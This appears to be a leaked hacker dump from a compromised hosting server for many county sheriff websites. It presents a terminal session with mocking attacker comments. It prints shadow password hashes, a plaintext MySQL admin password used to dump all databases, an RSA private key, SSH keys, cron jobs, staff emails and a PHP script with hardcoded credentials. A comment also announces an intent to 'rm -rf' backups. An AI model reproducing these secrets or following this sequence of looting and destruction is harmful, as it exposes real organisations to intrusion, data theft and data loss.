- ciga:$1$QTWBjVx9$zs4DkuPeQ7IuyaFtXby3B.:15113:0:99999:7:::
- sfcgar:$1$GqNHP49J$0idVp0wiWtAcd848aWI5O/:15131:0:99999:7:::
- lcsomo:$1$ptPfDVG3$nvwb9D.toLPBP1NsCRbNs1:15132:0:99999:7:::
- tcsoal:$1$0oUtGUJd$dAyePg9xnfh2dNDHRr/s80:15134:0:99999:7:::
- jwiegand:$1$F.H2Vzt/$BzID0ITAA2LtVZ99e5anu.:15135:0:99999:7:::
- bcsf:$1$pznU6Acd$jDjShBfJXAE3YUdsF7W140:15135:0:99999:7:::
- prsoms:$1$NpevRywM$.lnU4tjwBZNx5DyzQ5e8e0:15135:0:99999:7:::
- acsoms:$1$rRiyYAkw$a9FJbLJJZgcWYgdUX5m/B.:15147:0:99999:7:::
- kssa:$1$QJmmY.q8$GKzc4XMppwpKPbPVkI/1H1:15149:0:99999:7:::
- // YOU KNOW WHAT IT IS, ITS A STICKUP
- # ls -al ~root
- total 420776
- drwxr-x--- 17 root root 4096 Jul 22 11:37 .
- drwxr-xr-x 26 root root 4096 Feb 22 22:21 ..
- drwxr-xr-x 2 root root 4096 Nov 30 2010 .autoinstaller
- -rw------- 1 root root 19127 Jul 21 15:58 .bash_history
- -rw-r--r-- 1 root root 24 Jan 6 2007 .bash_logout
- -rw-r--r-- 1 root root 191 Jan 6 2007 .bash_profile
- -rw-r--r-- 1 root root 176 Jan 6 2007 .bashrc
- -rw-r--r-- 1 root root 121 Sep 2 2010 .cshrc
- -rw-r--r-- 1 root root 9 Feb 10 10:28 .exrc
- -rw------- 1 root root 686 Jul 20 13:03 .lesshst
- -rw------- 1 root root 1739 Jul 20 10:29 .mysql_history
- -rw-r--r-- 1 root root 91 Dec 23 2009 .pearrc
- -rw------- 1 root root 1024 May 3 09:00 .rnd
- drwx------ 2 root root 4096 Mar 12 2010 .spamassassin
- drwx------ 2 root root 4096 Jan 25 13:27 .ssh
- -rw------- 1 root root 276 Jul 20 10:44 .support_history
- -rw-r--r-- 1 root root 150 Sep 2 2010 .tcshrc
- -rw-r--r-- 1 root root 1143587 Jul 22 11:50 BOCS_warrant_query.sql
- -rw-r--r-- 1 root root 187976 Jul 22 11:45 CRCSD_warrant_query.sql
- -rw-r--r-- 1 root root 3543 Feb 23 09:42 Chicago
- drwxrwxrwx 17 20 games 4096 Dec 30 2009 ImageMagick-6.4.8-3
- -rw-r--r-- 1 root root 11148165 Apr 9 2009 ImageMagick-6.4.8-3.tar.gz
- drwxr-xr-x 2 root root 4096 Jul 14 15:15 MASS_PASS
- -rw-r--r-- 1 root root 94158 Dec 13 2010 MCSOAL.search
- -rw-r--r-- 1 root root 1501473 Jul 22 11:48 SFSOAR_warrant_query.sql
- -rw------- 1 root root 742 Feb 4 2008 anaconda-ks.cfg
- drwxr-xr-x 2 root root 4096 Jun 21 15:31 bin
- drwxr-xr-x 2 root root 4096 May 3 09:53 cert
- -rw-r--r-- 1 root root 1898 May 3 09:09 csr.txt
- drwxr-xr-x 3 root root 4096 Sep 20 2010 downloads
- -rw-r--r-- 1 bocg psacln 0 Jun 21 14:23 huh
- -rw-r--r-- 1 root root 1177 Mar 24 08:50 injection_patch.php
- -rw-r--r-- 1 root root 1182 Mar 24 08:50 injection_patch.php.bak
- -rw-r--r-- 1 root root 13552 Feb 4 2008 install.log
- -rw-r--r-- 1 root root 2540 Feb 4 2008 install.log.syslog
- -rwxrwxrwx 1 mosa psacln 803 Mar 24 2010 log.php
- -rw------- 1 root root 1733 Nov 30 2010 mbox
- -rw-r--r-- 1 root root 93 Aug 23 2010 md5look.php
- -rw-r--r-- 1 root root 36773929 Jul 21 22:04 mysql_backup.sql.gz
- -rw-r--r-- 1 root root 133498898 Jul 1 08:17
- mysql_dump_20110701-081158.sql.gz
- -rw-r--r-- 1 root root 144511936 Jul 8 10:59
- mysql_dump_20110708-104506.sql.gz
- -rw-r--r-- 1 root root 37564532 Jul 15 06:04
- mysql_dump_20110715-060000.sql.gz
- -rw-r--r-- 1 root root 38461089 Jul 22 11:18
- mysql_dump_20110722-111716.sql.gz
- drwxr-xr-x 2 root root 4096 Jun 20 09:46 p7zip
- -rwxrwxrwx 1 mosa psacln 475 Mar 24 2010 parse_geocodes.php
- -rw-r--r-- 1 root root 7164 Jul 5 14:20 perms.log
- drwxr-xr-x 14 1002 1002 4096 Aug 23 2006 php-5.1.6
- -rw-r--r-- 1 root root 8187896 Aug 23 2006 php-5.1.6.tar.gz
- -rw-r--r-- 1 root root 21 Apr 22 10:16 phpinfo.php
- drwxr-xr-x 9 root root 4096 Jul 21 16:24 psa
- drwxrwxr-x 2 510 510 4096 Jun 3 2010 qmhandle-1.3.2
- -rw-r--r-- 1 webdept webdept 15423 Apr 12 2010 qmhandle-1.3.2.tar.gz
- -rw-r--r-- 1 root root 4293 Jun 21 17:48 recaptcha.log
- -rw-r--r-- 1 root root 9751 Jun 21 16:04 recaptchalib.php
- -rw-r--r-- 1 root root 9751 Jun 21 16:04 recaptchalib.php.bak
- -rw-r--r-- 1 root root 9747 Jun 21 15:56 recaptchalib.php.bak.bak
- drwxr-xr-x 3 root root 4096 Dec 21 2009 rootkit_checks
- drwxr-xr-x 2 root root 4096 Jul 20 11:01 scripts
- -rw-r--r-- 1 root root 32 Jun 21 14:54 sete.sh
- -rw-r--r-- 1 root root 355812 Jun 21 14:22 tat E
- drwxr-xr-x 6 root root 4096 Jun 21 15:38 tiny_mce
- -rw-r--r-- 1 root root 2231 Jun 21 11:02 tiny_mce.php
- -rw-r--r-- 1 root root 8957 Jun 21 14:50 tinymce.log
- -rw-r--r-- 1 root root 6101 Jun 21 15:10 tinymce_php.log
- -rw-r--r-- 1 root root 1141875 Jun 29 18:20 warrant_query.sql
- -rw-r--r-- 1 root root 15503360 Jul 22 01:32 z
- // FIRST LETS LOOT THIS MOFO
- # mysqldump -q -u admin -p8w667nHzx%XFXb --all-databases --add-drop-table >
- booty.sql
- // GIMME THE KEYS TO YO HOUSE
- # cat ~root/.ssh/*
- ssh-rsa
- AAAAB3NzaC1yc2EAAAABIwAAAQEA68pUVD3lTeQE5yDAWFOprdg05lmD0eaRznMwDgrAiZhhTEH/
- D0crQDXJN5avBKIf1WdKBIi/AL7jlw4++CAdidYt1ZQ4VEQy3NVyVHqXmI/
- FtE2sCjUlE8ID2u5Mm5X8Xf57ifkXlrSF6HgLwa8P4KxP3HqrZNgb93hRwP/
- VPLkNA7Ef6pkjCMpcOtE0qYynDLswAQhW9abqhiCeWaHHPPTRwjlk0r/vHPwBns777pj5UgU3RkUG9/
- 1X70tKdZJR5Mp961WDGy3sC7Qi0hiM/
- A3tRdo2NKpiZje0oRX3x8WH69vO9ZITeYcxcfu0o9AwiIVHzxJ/DmzFGbRtZ3W/Hw==
- root@ip-72-167-49-108.ip.secureserver.net
- ssh-dss
- AAAAB3NzaC1kc3MAAACBAO/Ikm7ZPgaBYr1OlCnI4h82hB2pEppq24r+VR7/
- MVdKMKmUsQWYvZQG4CPphcXfUEY2sxBbAfSp53eR4AtBYomspYREzF045+
- dgtLj2o7MjDYacAt4KpjuxzglGT2H4hyRhz3fWJSzyubpeeb09nPDNxXOg0l/
- hJgPJWi8XjSj7AAAAFQD9MwyYL/
- DDniuYXNRBcaAAGEXl2wAAAIEAneCU3pUZ44NFoOqQF74GZjbb0XW8r6vVCwCMpoW1F3H5OcDxMSDUOE
- iZTil70hIQBelB8cus3xzn9NBQx/s/47Sb655IRYZDMWU8rwGzTP7U9/
- AiciF0sLrKsyqpbNLlDl79b9wBEkkpO6ELJDPYHK0cVfD0gReeG/vhnQbXYcEAAACBAKrwVdO/
- 7dFdKX9wZzvzA89DLWx1lpIJmbteKzsmIIAoJJgfw7gITb0hKnaRw8v5xQgmC379VRfWC31feB4dORrj
- njKLQLjBiu8jHeL+WqQ/vp/Fg9XhioLDwWHUb5iVrv0VeRbn8Q//
- ltLrbBcqD0dslZ1nRN8i0NCY11B5ubq3 root@ip-72-167-49-122.ip.secureserver.net
- -----BEGIN RSA PRIVATE KEY-----
- MIIEowIBAAKCAQEAwIP5sXbYS2wsbN8nFPHLzF2qHi/A/eRBcO8CrAtYk8akXpG7
- ROZUdqlD/LnOfjykC+gv8qi8lWrnU9p/p5VjY8Gcv1JWLAfv5+GeA5bFnOpf1ZD7
- gvUdFQXzK5JcFH0V03sJkV1m/oRHQ+V6t7HxTRfiaXLuuT/PCxo4tUuxeaOBJaWd
- 2sLYQaPOb6z27UDafPPg7o7mO0HPCxDSsPW07P0s+xB5QCsk84cFchImi8oZyPwK
- 6ySGvtY0YQRTE1Ixek86d/UM64PY/R5QvXy61FfbnVqlfbD5LbXM+6yLxhxSeHUy
- MGpWkXRMrhroA71e1T68rHZU7qoALHZrdsL8hQIBIwKCAQEAn4NLO0U232hCERCr
- Wn8z1TeqNkTTG4Kcn2bzld2D6Cg/DIdgps15Lx6IyhZMAjI+yAmG0F/stlFDVBtx
- FdOM3aBr7vsUMxyE81SKPXzs4Rn3olOOkRQ8qwTuDijP87gZZhV89Mm7vPFCXNQV
- OR5o2XowoIPNHSY91f/IljdnKkQ05862XywXDqKA4ZURgs2WhCSCGU+bMQ/HcrXx
- whUi5tWgAH9JTd8cVHbTFNHS9nyf3rsqoKsPjUJZot+RpvBzUk75VsKxEm/NpPUz
- foMVR/H0vHl1Y5rv6P0fLzBPUBPBSqM94ELa3niBgsOJsdmzWGUnuZjoYX2Q5RCD
- qa5NHwKBgQDscK4JiSdSh7egaKrFqpDECVR3PtE0gsluxT0am6UmrelZIlILmfFf
- a3J3QHnGzSPuIJit1Px1su5Jt6qwc2R98DRmGgb2n8BHdNQTU1bpmD4K9iwMD8fx
- 5bPNLcC69xKD9TSDS6FaHQRHdLnpwuho3m5mlbGISlVOCtU8/yTnUwKBgQDQcQ/B
- CuHlfB86NIwTTIvTjYUBotk0NqMgHHyLeoZ+mz4kZWKZl7Dp9gC7lA3ljFZh4jIG
- VD8hlmLflVSjY7EFDEjB7GQ3wsEMGXqVVd/jsE4TNnizehxhUh/0pp/bBHZg0OWZ
- Lmak2rJxvt7uI5Bs9g+huy+Q3zi8oz3NW2HJxwKBgQDYLIHc1StEJFAdoYYxEPli
- xrOgOW7Q7Jro7tjH3sLhiQ/cdyZxAca9pBDiDxBAu46QktS8MHHKsjjy8REWWt+J
- FiFHaEDhfB2DKPxpcMR9zQWGXWoZqAdDkC9cgZpEih+Olwtwui0fMHjw37/rquMe
- DTG84KJQuP2JLnnRXk2gSwKBgQDEh9unYggwJJJ4tTOdKuo8fh5R//FdHZJ9XK/x
- OQJ3Xyv2bjhk7hvVRwgBURRqt4Slbt61gqHsd9mQ+oMAc/AMEuWDpF59t6ASuO/r
- 40DPXRZp4ubVG1yWRh4hL2OFW/qVzEYxV6Kbbx1GrKZOPsoAVbb3kzt59wmb6l7X
- kKyoTQKBgEtKR9eP5drKiFtGbanMoe4R01yeoda8GcbHenuW8f4+SIzXS0BRYDMG
- JccKz/XyIk+uxGS+qRDWUS3KFWz8/PUEpLOAEuCv45GpyUVb6XS7O6dn6uVRwEUr
- UYo6Q+HxQ0ZvBOxtG/usuR0ykiV60GuTxjxVXE6urOWSaypWOaUc
- -----END RSA PRIVATE KEY-----
- ssh-rsa
- AAAAB3NzaC1yc2EAAAABIwAAAQEAwIP5sXbYS2wsbN8nFPHLzF2qHi/A/
- eRBcO8CrAtYk8akXpG7ROZUdqlD/LnOfjykC+gv8qi8lWrnU9p/p5VjY8Gcv1JWLAfv5+
- GeA5bFnOpf1ZD7gvUdFQXzK5JcFH0V03sJkV1m/oRHQ+V6t7HxTRfiaXLuuT/
- PCxo4tUuxeaOBJaWd2sLYQaPOb6z27UDafPPg7o7mO0HPCxDSsPW07P0s+
- xB5QCsk84cFchImi8oZyPwK6ySGvtY0YQRTE1Ixek86d/UM64PY/R5QvXy61FfbnVqlfbD5LbXM+
- 6yLxhxSeHUyMGpWkXRMrhroA71e1T68rHZU7qoALHZrdsL8hQ==
- root@ip-97-74-115-143.ip.secureserver.net
- 72.167.49.114 ssh-rsa
- AAAAB3NzaC1yc2EAAAABIwAAAQEAnNcO5j+
- xTWrszbZLZ7pdvvqTumaACzgJNW773NBt8laQEq0HUDfdt3tg5LpaIWQTOBD45jjkyiM2QNJq9CliNfJ
- BnOajtUI90IN2M3xK78ihiHAsp4jdX6kKcpyQrffQ5i8fDllfQmcD/
- 7gndTzo273l8BmhQnvIxOTZwGcQPCnylQ7mxmV/KmRUF5uvo2dAkxSZnmOyDEMZLAAcic/+
- 98cBbxpXu4154ZLG8pXAJ3ASzm7oC4KsC0T2eFt6Um3/BVNMydFc9KiVbyBy4mUda8/
- icvq90TYue3wXWIGwhIPMafSHst6SVAo1m9KLsCA3y1FbHEwK6YzUVi0ZtNmfRw==
- 72.167.49.108 ssh-rsa
- AAAAB3NzaC1yc2EAAAABIwAAAQEA6QYFzjOfwhDhJbKf7tN3CcP2VN5euOPRtuDEtuo8Hm4loFsKsVu/
- Z4AAObT4nhksaowpND8vzfGikitgZibICYLlMcx8JjHFKaaqmbVYocVdm8HpHmYAvII3BJkIZJ9hT7IR
- hp1bc4z/KeUgDVquCR4ak4f4hL9eY0w8Cxc3oM/jYw/bFg+nIBs0dctch3Pw/
- 4pREyBPO8p2BReWI7WlcA1i4NdzhoevE+
- 2qsvMzVWp7HGCIGOQDKgbBL65m2bJrDOZELrvDcBcdrogIpqLO6kSXOnjjVKdcT7zpQuFPR+7wj6t/
- fyMcYPx80XmaDzKbGbNpHSPVsKTJsHqh+NRnqQ==
- ssh-dss
- AAAAB3NzaC1kc3MAAACBAO/Ikm7ZPgaBYr1OlCnI4h82hB2pEppq24r+VR7/
- MVdKMKmUsQWYvZQG4CPphcXfUEY2sxBbAfSp53eR4AtBYomspYREzF045+
- dgtLj2o7MjDYacAt4KpjuxzglGT2H4hyRhz3fWJSzyubpeeb09nPDNxXOg0l/
- hJgPJWi8XjSj7AAAAFQD9MwyYL/
- DDniuYXNRBcaAAGEXl2wAAAIEAneCU3pUZ44NFoOqQF74GZjbb0XW8r6vVCwCMpoW1F3H5OcDxMSDUOE
- iZTil70hIQBelB8cus3xzn9NBQx/s/47Sb655IRYZDMWU8rwGzTP7U9/
- AiciF0sLrKsyqpbNLlDl79b9wBEkkpO6ELJDPYHK0cVfD0gReeG/vhnQbXYcEAAACBAKrwVdO/
- 7dFdKX9wZzvzA89DLWx1lpIJmbteKzsmIIAoJJgfw7gITb0hKnaRw8v5xQgmC379VRfWC31feB4dORrj
- njKLQLjBiu8jHeL+WqQ/vp/Fg9XhioLDwWHUb5iVrv0VeRbn8Q//
- ltLrbBcqD0dslZ1nRN8i0NCY11B5ubq3 root@ip-72-167-49-122.ip.secureserver.net
- // NOW LETS SEE WHAT YOU WORKING WITH
- # cat ~root/scripts/*
- #!/bin/sh
- datex=$(date +'%Y%m%d-%H%M%S')
- file=mysql_dump_$datex.sql.gz
- echo Backup is $file
- PASSWORD=`cat /etc/psa/.psa.shadow`
- mysqldump -q -u admin -p$PASSWORD --all-databases --add-drop-table | gzip >
- ~/$file
- 0,15,30,45 * * * * /usr/local/psa/admin/sbin/backupmng >/dev/null
- 2>&1
- 0 1 * * 1 /usr/local/psa/libexec/modules/watchdog/cp/secur-check
- 0 1 * * 1 /usr/local/psa/libexec/modules/watchdog/cp/send-report
- weekly
- 10 1 * * * /usr/local/psa/libexec/modules/watchdog/cp/clean-
- sysstats
- 15 1 * * * /usr/local/psa/libexec/modules/watchdog/cp/pack-
- sysstats day
- 15 1 * * 1 /usr/local/psa/libexec/modules/watchdog/cp/pack-
- sysstats week
- 15 1 1 * * /usr/local/psa/libexec/modules/watchdog/cp/pack-
- sysstats month
- 15 1 1 * * /usr/local/psa/libexec/modules/watchdog/cp/pack-
- sysstats year
- 20 1 * * * /usr/local/psa/libexec/modules/watchdog/cp/clean-
- events
- 0 3 * * 7 /usr/local/psa/libexec/modules/watchdog/cp/clean-
- reports
- 0 22 * * * /root/scripts/mySQLbackup.sh | mail -s
- "mySQL Backup" test@mostwantedwebsites.net
- 50 23 * * * /usr/bin/rsnapshot daily
- 40 23 * * 6 /usr/bin/rsnapshot weekly
- 0 1 * * * /usr/bin/php
- /var/www/vhosts/baxtercountysheriff.com/httpdocs/admin_dymin/modules/most_wanted
- /config/delete_cron.php
- */5 * * * * /usr/bin/php
- /var/www/vhosts/baxtercountysheriff.com/home/parse_xml.php >/dev/null 2>&1
- */5 * * * * /usr/bin/php
- /var/www/vhosts/lawrencecosheriff.com/home/parser.php >/dev/null 2>&1
- #*/5 * * * * /usr/bin/php
- /var/www/vhosts/mostwantedwebsites.net/subdomains/lawmo/httpdocs/home/parser.php
- >/dev/null 2>&1
- */5 * * * * /usr/bin/php
- /var/www/vhosts/cherokeecountyalsheriff.com/home/parser.php >/dev/null 2>&1
- */5 * * * * /usr/bin/php
- /var/www/vhosts/jocomosheriff.org/home/parse_roster.php >>
- /backup/johms_parse_log.txt
- */5 * * * * /usr/bin/php
- /var/www/vhosts/stonecountymosheriff.com/home/parse_roster.php >>
- /backup/stoms_parse_log.txt 2>&1
- */5 * * * * /usr/bin/php
- /var/www/vhosts/crosscountysheriff.org/home/Cross\ County/parse_pcv.php
- >/dev/null 2>&1
- */5 * * * * /usr/bin/php
- /var/www/vhosts/boonesheriff.com/home/parse_pcv.php >/dev/null 2>&1
- */16 * * * * /usr/bin/php
- /var/www/vhosts/crosscountysheriff.org/home/Cross\ County/warrant_parser.php
- >/dev/null 2>&1
- */15 * * * * /usr/bin/php
- /var/www/vhosts/boonesheriff.com/home/warrant_parser.php >/dev/null 2>&1
- */15 * * * * /usr/bin/php
- /var/www/vhosts/tunicamssheriff.com/httpdocs/RPC/test.php >/dev/null 2>&1
- */10 * * * * /usr/bin/php
- /var/www/vhosts/jonesso.com/home/parse.php >> /backup/JONMS_INMATE_ROSTER.log
- 2>&1
- */15 * * * * /usr/bin/php
- /var/www/vhosts/prattcountysheriff.com/home/parse_roster.php >/dev/null 2>&1
- */15 * * * * /usr/bin/php
- /var/www/vhosts/prattcountysheriff.com/home/parse_warrants.php >/dev/null 2>&1
- */15 * * * * /usr/bin/php
- /var/www/vhosts/jeffersoncountykssheriff.com/home/parse_roster.php >>
- /backup/jcsoks_inamte_parse_log.txt
- */5 * * * * /usr/bin/php
- /var/www/vhosts/stfranciscountysheriff.org/home/parse_pcv.php >/dev/null 2>&1
- */5 * * * * /usr/bin/php
- /var/www/vhosts/howardcountysheriffar.com/home/parse_pcv.php >/dev/null 2>&1
- 0 6 * * * /usr/bin/php
- /var/www/vhosts/baxtercountysheriff.com/httpdocs/admin/publish_roster.php
- >/dev/null 2>&1
- 5 6 * * * /usr/bin/php
- /var/www/vhosts/crosscountysheriff.org/httpdocs/admin/modules/inmate_roster/
- publish.php >/dev/null 2>&1
- 10 6 * * * /usr/bin/php
- /var/www/vhosts/cherokeecountyalsheriff.com/httpdocs/admin/modules/inmate_roster
- /publish.php >/dev/null 2>&1
- 15 6 * * * /usr/bin/php
- /var/www/vhosts/lawrencecosheriff.com/httpdocs/admin/modules/inmate_roster/
- publish.php >/dev/null 2>&1
- 20 6 * * * /usr/bin/php
- /var/www/vhosts/tunicamssheriff.com/httpdocs/admin/modules/inmate_roster/publish
- .php >/dev/null 2>&1
- 30 6 * * * /usr/bin/php
- /var/www/vhosts/boonesheriff.com/httpdocs/admin/modules/inmate_roster/publish.
- php >/dev/null 2>&1
- 0 10 * * * /usr/bin/php
- /var/www/vhosts/prattcountysheriff.com/httpdocs/admin/modules/inmate_roster/
- publish.php >/dev/null 2>&1
- 25 6 * * * /usr/bin/php
- /var/www/vhosts/jocomosheriff.org/httpdocs/admin/modules/inmate_roster/publish.
- php >/dev/null 2>&1
- 40 6 * * * /usr/bin/php
- /var/www/vhosts/jeffersoncountykssheriff.com/httpdocs/admin/modules/
- inmate_roster/publish.php >/dev/null 2>&1
- 50 6 * * * /usr/bin/php
- /var/www/vhosts/jonesso.com/httpdocs/admin/modules/inmate_roster/publish.php
- >/dev/null 2>&1
- 50 5 * * * /usr/bin/php
- /var/www/vhosts/stfranciscountysheriff.org/httpdocs/admin/modules/inmate_roster/
- publish.php >/dev/null 2>&1
- 0 2 * * * /usr/bin/php
- /var/www/vhosts/marionsoal.com/httpdocs/admin/modules/inmate_roster/cron/cron.
- php
- 40 1 * * * /usr/bin/find /var/www/vhosts/ -mtime -1
- | /bin/grep -v statistics | /bin/grep -v counter 2>&1 | perl -wple 'BEGIN{print
- "Changed Web Files - New GoDaddy"}'| mail -s "Changed Web Files - GoDaddy" -c
- bnewman@bjmweb.com -c galexander@bjmweb.com -c markm@bjmweb.com root
- 0 * * * * /usr/bin/find
- /var/www/vhosts/*/httpdocs/uploads/*.php | grep -v -e
- "watermark_wanted_photo.php" -e "checkimages.php" | mail -s "Go Daddy - Upload
- Scanner" -c galexander@bjmweb.com -c markm@bjmweb.com -c bnewman@bjmweb.com root
- 0 1 * * * /backup/mail_logs/parse_mail_log.sh
- 1 0 * * * /usr/bin/php
- /var/www/vhosts/grantcountyar.com/httpdocs/cron/purge_events.php
- 1 0 * * * /usr/bin/php
- /var/www/vhosts/crosscountyar.org/httpdocs/cron/purge_events.php
- 1 0 * * * /usr/bin/php
- /var/www/vhosts/izardhometownhealth.com/httpdocs/cron/purge_events.php
- 1 0 * * * /usr/bin/php
- /var/www/vhosts/crosscountysheriff.org/httpdocs/cron/purge_events.php
- 1 0 * * * /usr/bin/php
- /var/www/vhosts/cityofwynne.com/httpdocs/cron/purge_events.php
- 1 0 * * * /usr/bin/php
- /var/www/vhosts/boonecountyar.com/httpdocs/cron/purge_events.php
- 1 0 * * * /usr/bin/php
- /var/www/vhosts/barrycountysheriff.com/httpdocs/cron/purge_wanted.php
- 1 0 * * * /usr/bin/php
- /var/www/vhosts/izardcountyar.org/httpdocs/cron/purge_events.php
- 1 0 * * * /usr/bin/php
- /var/www/vhosts/mosheriffs.com/httpdocs/cron/cron.php
- 1 0 * * * /usr/bin/php
- /var/www/vhosts/stfranciscountysheriff.org/httpdocs/cron/purge_events.php
- 1 0 * * * /usr/bin/php
- /var/www/vhosts/knoxcountysheriffil.com/httpdocs/cron/purge_events.php
- */2 * * * * /usr/bin/php
- /var/www/vhosts/gra_upload_scanner.php >/dev/null 2>&1
- 0 1 * * *
- /var/www/vhosts/mostwantedwebsites.net/subdomains/code/httpdocs/search/cron.sh
- >/dev/null
- #
- # BCSD Site Search Cron
- 0 1 * * * cd
- /var/www/vhosts/baxtercountysheriff.com/httpdocs/search/admin/ && /usr/bin/php
- /var/www/vhosts/baxtercountysheriff.com/httpdocs/search/admin/spider.php -u
- http://baxtercountysheriff.com/ -r -n
- http://baxtercountysheriff.com/warrants.php?find=all >/dev/null 2>&1
- #
- # CRCSD Site Search Cron
- 5 1 * * * cd
- /var/www/vhosts/crosscountysheriff.org/httpdocs/search/admin/ && /usr/bin/php
- /var/www/vhosts/crosscountysheriff.org/httpdocs/search/admin/spider.php -u
- http://crosscountysheriff.org/ -r -n
- http://crosscountysheriff.org/warrants.php?find=all >/dev/null 2>&1
- #
- #
- # MCSD Site Search Cron
- 10 1 * * * cd
- /var/www/vhosts/marioncountysheriffar.com/httpdocs/search/admin/ && /usr/bin/php
- /var/www/vhosts/marioncountysheriffar.com/httpdocs/search/admin/spider.php -u
- http://marioncountysheriffar.com/ -r -n
- http://marioncountysheriffar.com/warrants.php?find=all >/dev/null 2>&1
- #
- #
- # SFSOAR Site Search Cron
- 15 1 * * * cd
- /var/www/vhosts/stfranciscountysheriff.org/httpdocs/search/admin/ &&
- /usr/bin/php
- /var/www/vhosts/stfranciscountysheriff.org/httpdocs/search/admin/spider.php -u
- http://stfranciscountysheriff.org/ -r -n
- http://stfranciscountysheriff.org/warrants.php?find=all >/dev/null 2>&1
- #
- #
- # GCSOMS Site Search Cron
- 0 1 * * * cd
- /var/www/vhosts/georgecountymssheriff.com/httpdocs/search/admin/ && /usr/bin/php
- /var/www/vhosts/georgecountymssheriff.com/httpdocs/search/admin/spider.php -u
- http://georgecountymssheriff.com/ -r -n
- http://georgecountymssheriff.com/warrants.php?find=all >/dev/null 2>&1
- #
- #
- # CPSOLA Site Search Cron
- 0 1 * * * cd
- /var/www/vhosts/cameronso.org/httpdocs/search/admin/ && /usr/bin/php
- /var/www/vhosts/cameronso.org/httpdocs/search/admin/spider.php -u
- http://cameronso.org/ -r -n http://cameronso.org/warrants.php?find=all
- >/dev/null 2>&1
- #
- #
- # MCSOGA Site Search Cron
- 0 1 * * * cd
- /var/www/vhosts/meriwethercountysheriff.org/httpdocs/search/admin/ &&
- /usr/bin/php
- /var/www/vhosts/meriwethercountysheriff.org/httpdocs/search/admin/spider.php -u
- http://meriwethercountysheriff.org/ -r -n
- http://meriwethercountysheriff.org/warrants.php?find=all >/dev/null 2>&1
- #
- 47 23 * * * /usr/sbin/ntpdate -b -s time.nist.gov
- #!/bin/sh
- PASSWORD=`cat /etc/psa/.psa.shadow`
- mysqldump -u admin -p$PASSWORD --all-databases --add-drop-table |gzip -v9 >
- /root/mysql_backup.sql.gz
- #!/bin/bash
- #
- # Scan for PHP in upload folders
- #
- MAILTO="-c galexander@bjmweb.com -c markm@bjmweb.com -c bnewman@bjmweb.com root"
- EXCLUDES="-e watermark_wanted_photo.php -e checkimages.php -e
- watermark_recalled_photo.php"
- lineify (){
- for i in $*
- do
- echo $i
- done
- }
- # testing
- #EXCLUDES="numnum"
- #MAILTO="jwiegand@bjmweb.com"
- #
- UHOH=$(/usr/bin/find /var/www/vhosts/*/httpdocs/uploads/*.php | \
- grep -v $EXCLUDES)
- if [ "${UHOH}xx" != "xx" ]
- then
- lineify $UHOH | mail -s "Go Daddy - Upload Scanner" $MAILTO
- fi
- // HARDCODED MYSQL ROOT PASSWORDS... THE SIGN OF ANY SECURE SYSADMIN
- # cat ~root/MASS_PASS/masspass.php
- <?php
- error_reporting(0);
- if(php_sapi_name() == 'cli' && empty($_SERVER['REMOTE_ADDR'])) {
- echo md5('Y9BNtSeb').PHP_EOL;
- //custom safe_query, should work like normal, just allows passing of custom
- connect
- function safe_query($q, $u='', $p='', $d='', $s='localhost'){
- $l = mysql_connect($s,$u,$p) or die("ERROR: Could not connect with USER:
- $u PASS: $p ".PHP_EOL.mysql_error);
- if($d != ''){
- mysql_select_db($d,$l) or die("ERROR: Could not select DATABASE:
- $d".PHP_EOL);
- }
- $r = mysql_query($q,$l)/* or die("ERROR: Could not execute QUERY: $q
- ".PHP_EOL.mysql_error()) */;
- return $r;
- }
- $GD_USER = 'admin';
- $GD_PASS = '8w667nHzx%XFXb';
- $GD_SERV = 'localhost';
- $options = getopt("n::o::");
- $query = 'SHOW DATABASES';
- $result = safe_query($query, $GD_USER, $GD_PASS, '', $GD_SERV);
- while($row = mysql_fetch_array($result,MYSQL_NUM)){
- $query = 'SELECT password FROM dymin_user WHERE username = "bjm"';
- $r = safe_query($query, $GD_USER, $GD_PASS, $row[0], $GD_SERV);
- echo $row[0].' - '.mysql_result($r,0,'password').PHP_EOL;
- if(isset($options['n']) && isset($options['o'])){
- //echo 'UPDATE dymin_user SET password =
- "'.mysql_escape_string($options['n']).'" WHERE username = "bjm" AND password =
- "'.mysql_escape_string($options['o']).'"'.PHP_EOL;
- safe_query('UPDATE dymin_user SET password =
- "'.mysql_escape_string($options['n']).'" WHERE username = "bjm" AND password =
- "'.mysql_escape_string($options['o']).'"', $GD_USER, $GD_PASS, '', $GD_SERV);
- }
- }
- }else{
- echo 'This script can only be ran from the command line!'.PHP_EOL;
- exit();
- }
- ?>
- // GOTTA MAKE SURE TO RM -RF THIS PART FIRST
- # ls -al /backup
- total 318424
- drwxr-xr-x 9 root root 4096 Jul 14 11:30 .
- drwxr-xr-x 26 root root 4096 Feb 22 22:21 ..
- -rw-r--r-- 1 root root 17015 Jul 14 2010 ActiveWarrantsList.txt.back
- -rw-r--r-- 1 root root 175 May 12 09:36 BCSD_PARSE_XML
- drwxrwxrwx 2 root root 4096 Jun 29 18:23 BOCS_WARRANTS
- drwxrwxrwx 2 root root 4096 Jun 29 18:24 CRCSD_WARRANTS
- -rwxrwxrwx 1 root root 20852332 Jul 22 22:20 JONMS_INMATE_ROSTER.log
- -rw-r--r-- 1 root root 90737 Mar 2 08:50 JONMS_INMATE_ROSTER.log.2.gz
- -rwxrwxrwx 1 root root 324196 Feb 7 09:20 JONMS_INMATE_ROSTER.log.gz
- -rwxrwxrwx 1 root root 286813 Oct 28 2010 JONMS_INMATE_ROSTER.log.gz.0
- -rwxrwxrwx 1 root root 88758 Aug 10 2010 JONMS_INMATE_ROSTER.log.gz.1
- -rw-r--r-- 1 root root 13864960 Apr 21 08:19 POALAC04212011.tar
- -rw-r--r-- 1 root root 10833920 Mar 7 16:53 POALAC_BACKUP.tar
- -rw-r--r-- 1 root root 13864960 Apr 20 16:09 POALAC_BACKUP_04202011.tar
- drwxrwxrwx 2 root root 4096 Jun 29 18:24 SFSOAR_WARRANTS
- -rw-r--r-- 1 root root 68177920 May 3 09:47 arsa.05032011.tar
- drwxr-xr-x 3 root root 4096 Apr 21 11:06 bcsd
- -rw-r--r-- 1 root root 55494137 Jul 22 22:20 crcsd_query_log.txt
- -rw-r--r-- 1 root root 1080247 Apr 7 13:05 crcsd_query_log.txt.04072011.gz
- -rwxrwxrwx 1 root root 4181055 Feb 7 09:25 crcsd_query_log.txt.gz
- -rw-r--r-- 1 root root 116504777 Jul 22 22:15 jcsoks_inamte_parse_log.txt
- -rw-r--r-- 1 root root 527887 Apr 7 13:00
- jcsoks_inamte_parse_log.txt.04072011.gz
- -rwxrwxrwx 1 root root 1568892 Feb 7 09:15 jcsoks_inamte_parse_log.txt.gz
